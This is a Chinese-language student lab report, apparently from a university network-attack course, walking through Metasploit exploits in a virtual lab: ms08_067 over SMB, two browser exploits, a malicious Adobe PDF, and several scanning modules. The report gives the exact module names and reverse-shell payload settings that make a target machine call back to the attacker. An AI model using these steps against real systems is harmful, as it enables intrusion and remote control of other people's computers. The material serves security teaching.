Exp5 MSF基础应用 20164320 王浩
1. 实践目标
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
2.实践内容
攻击机IP
靶机IP
2.1一个主动攻击实践,ms08_067; (1分)
输入 “msfconsole” 及“search ms08_067”进行漏洞搜索
输入search ms08_067
输入“use exploit/windows/smb/ms08_067_netapi”及“show payloads”显示可调用的攻击载荷
输入“set payload generic/shell_reverse_tcp”设置攻击载荷,tcp反弹连接
“set LHOST 192.168.40.128”及“set LPORT 4320”设置回连ip及端口
“set RHOST 169.254.169.145"设置
靶机winxp ip
“set target 0”自动选择目标系统类型,匹配度较高
“show options”查看设置是否正确
最后输入“exploit”开启监听
监听成功
2.2 一个针对浏览器的攻击,ms10_046,MS10_002_aurora唯一;(1分)
2.2.1ms10_046
基本步骤同上,不过是使用“use exploit/windows/browser/ms10_046_shortcut_icon_dllloader”模块
1.也是先输入msfconsole
然后查找漏洞ms10_046
然后使用ms10_046_shortcut_icon_dllloader模块
发现SRVHOST没填,输入“set SRVHOST 192.168.40.128
输入“exploit”,可以看到生成一个url
在靶机的浏览器中访问该url
出现问题:(浏览器找不到地址,虚拟机连不上宿舍网,换了图书馆的网以后显示正常)
正常(IP地址变为192.168.198.147)
在kali中回连成功
输入“sessions -i 1”接入ID为1的活动链接,获取靶机shell
2.2.2MS10_002_aurora漏洞攻击 唯一
ms10_002台风漏洞是IE浏览器漏洞,也是黑客挂马利用的最热门漏洞
输入“use windows/browser/ms10_002_aurora”调用模块
“set payload windows/meterpreter/reverse_http”设置http反向回连
然后设置攻击机ip和攻击端口
“set URIPATH 4320wh”设置统一资源标识符路径
生成url
在浏览器中访问(回连成功)
2.3 一个针对客户端的攻击;(1分)
ADOBE
选择“use exploit/windows/browser/adobe_cooltype_sing”模块
“set payload windows/meterpreter/reverse_tcp”设置tcp反向连接
设置攻击机ip和端口
“set FILENAME 20164320.pdf”设置攻击文件名称
由于我用的是 browser 下的攻击模块,所以它会生成一个 url 链接,点开会自动下载一个空白的 pdf 文件。
在kali中查看 攻击成功,获取靶机shell
2.4 成功应用任何一个辅助模块。(0.5分)
2.4.1 tcp端口扫描
输入“use auxiliary/scanner/portscan/tcp” 扫描目标主机上TCP使用的端口号
重启计算机后虚拟机IP发生了变化
“set RHOST 192.168.198.147”设置靶机ip
2.4.2 smb_version
输入“scanner/smb/smb_version”查看靶机的smb版本
“set RHOST 192.168.198.147”设置靶机ip
2.4.3 udp
输入“use auxiliary/scanner/discovery/udp_sweep” 检测目标主机上常用的udp服务
“set RHOSTS 192.168.198.147”设置靶机ip
3.基础问题回答
用自己的话解释什么是exploit,payload,encode?
答: exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。
payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即通过渗透攻击把攻击载荷运至靶机中。
Ecode:编码器,对代码进行异或、祛除坏字符及其他编码,保护攻击载荷不被发现。
离实战还缺些什么技术或步骤?
答:我们学会了初步的渗透、免杀、攻击,但在实战中如何让靶机运行我们制作的病毒文件是我们缺少的,因为我不会傻傻的访问一个我不了解网站,然后下载一个对我没有意义的文件,更不用说运行那个文件了。
4.实践总结与体会
这次实验总体来说难度一般,,就是过程太过冗杂,实验做到现在感觉脑子越来越混乱,攻击只能靠百度搜漏洞的感觉实在是不好,希望以后能有机会真正来一场网络对抗
Exp5 MSF基础应用 20164320 王浩的更多相关文章
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- POST 请求中 multipart/form-data、 application/x-www-form-urlencoded 的区别
以 Postman 为工具来看一下这两个编码类型的数据格式,假设我们需要传输的数据为 { "name": "test", "age": 18 ...
- activiti工作流笔记
什么是activiti? Activiti是一个身经百战的业务流程管理引擎, 并且还是一个流程平台 为什么要用工作流引擎? 简单来说,就是为了统一管理流程业务. 想想看,如果要设计一个流程的程序,通常 ...
- 25)django-form使用
目录 1)django form作用 2)django form使用 一:django form 作用 django form有两个作用:一是用户输入数据验证:二是生成html 1)用户输入数据验证, ...
- python正则表达式--特殊字符
正则表达式—特殊表达式含义 正则表达式的字母和数字表示他们自身,但多数字母和数字前加一个反斜杠时会拥有不同的含义. 下面列出了正则表达式模式语法中的特殊元素. 1.普通字符集 1) \w ...
- java集合(list,set,map)
集合 集合与数组 数组(可以存储基本数据类型)是用来存现对象的一种容器,但是数组的长度固定,不适合在对象数量未知的情况下使用. 集合(只能存储对象,对象类型可以不一样)的长度可变,可在多数情况下使用. ...
- C++\CLI语法 在项目中的使用
通常情况下,对一个标准的com组件进行集成,网上普遍使用的方式有: 1.#import *.dll 或 #import *.ocx的方式,VS编译器重新编译后,就会自动生成组件对应的*.tlh文件,该 ...
- Emacs Org-mode 4 超连接
4.1 连接格式 连接的格式非常的简单,示例如下: [[文档内部锚点.外部连接][对连接的描述,可选]] 4.2 内部连接 想要引用或者连接到文档自身内的某个位置,需要引入另外一个概念:anchor( ...
- java 获取用户ip
JSP里,获取客户端的IP地址的方法是: request.getRemoteAddr() 这种方法在大部分情况下都是有效的.但是在通过了Apache,Squid等反向代理软件就不能获取到客户端的真实I ...
- git官网和安装使用教程链接
git官网 https://git-scm.com/download/win git安装教程 https://www.cnblogs.com/wj-1314/p/7993819.html
- ~/Library/MobileDevice/Provisioning Profiles
~/Library/MobileDevice/Provisioning Profiles